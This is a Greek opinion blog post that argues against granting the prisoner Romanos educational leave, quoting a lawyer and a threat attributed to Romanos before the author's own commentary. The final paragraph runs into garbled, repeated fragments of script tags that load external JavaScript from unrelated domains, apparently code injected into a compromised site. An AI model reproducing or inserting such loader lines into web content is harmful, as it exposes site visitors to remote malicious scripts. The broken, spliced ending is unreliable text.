Εκεί που μας χρωστούσαν, μας πήραν και το βόδι!!! Του Θαλή Κουτούπη

0046

“Κατ’ αρχάς για να παίρνει κάποιος εκπαιδευτική άδεια και να βγαίνει απ’ τη φυλακή κάθε μέρα για να πηγαίνει στο πανεπιστήμιο πρέπει να πληροί κάποιες προϋποθέσεις, όπως:

  • Να έχει εκτίσει ένα συγκεκριμένο μέρος της ποινής του,
  • να κριθεί απ’ τους υπεύθυνους ότι δεν υπάρχει κίνδυνος να διαφύγει,
  • να κριθεί επίσης ότι δεν υπάρχει κανένας κίνδυνος να εγκληματήσει.

Ο  Ρωμανός όμως δεν πληρεί καμία από τις παραπάνω προϋποθέσεις. 

Ούτε έχει εκτίσει το μέρος της ποινής που απαιτείται, ούτε έχει αποδείξει ότι δεν θα είναι δημόσιος κίνδυνος. Έχει δε απειλήσει αρκετές φορές και μέσα απ’ τη φυλακή.

Μία απ’ αυτές, με αφορμή τα ευρήματα της τρομοκρατικής οργάνωσης “Συνωμοσία των Πυρήνων της Φωτιάς” σε Βόλο και Καλλιθέα έγραψε ότι:

“Υπάρχουν επαναστατημένοι άνθρωποι, σύντροφοι για μένα, τρομοκράτες για σας, που δεν σκοπεύουν ν’ ανεχτούν την εξόντωσή μας χωρίς πρώτα να κάνουν εσάς και τους πολιτικούς σας προϊστάμενους σας να ματώσουν. Αν θέλετε μπορείτε να το εκλάβετε ως απειλή”.

Αλκαίος Βγενόπουλος –  Δικηγόρος

ΔΙΚΟ ΜΟΥ ΣΧΟΛΙΟ

Έχουν ξεσηκωθεί όλοι οι οπαδοί της βίας, για να “παρανομήσει” το Κράτος και να “σώσει” τον Ρωμανό, που μπορεί αν θέλει να “σωθεί” αμέσως μόνος του!

Ο Ρωμανός δεν διεκδικεί “εκπαίδευση”. Ηρωποίηση διεκδικεί, για να την εξαγοράσει αργότερα είτε σε τρομοκρατικούς είτε σε συγγενικούς πολιτικούς κύκλους.

Αλλοίμονο, αν το Κράτος υπέκυπτε σε “εκβιασμούς” κάθε είδους τρομοκρατών, κακούργων κι εγκληματιών! Τότε οποιοσδήποτε φυλακισμένος εγκληματίας θα μπορούσε να κάνει απεργία πείνας, διεκδικώντας να αφεθεί ελεύθερος!

Είναι τρομακτική αυτή η άμεση ή έμμεση “αριστεροπροοδευτική” στήριξη κάθε εγκληματία και τρομοκράτη, απεχθής κι επονείδιστη η αδιαφορία κι η “προσβολή” των θυμάτων τους (όπως τα τρία θύματα της Marfin) και αυτόχρημα επικίνδυνη η σχετική “παθητικότητα” των πραγματικών φιλελεύθερων δημοκρατών, απέναντι σ’ αυτό το φαινόμενο!___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >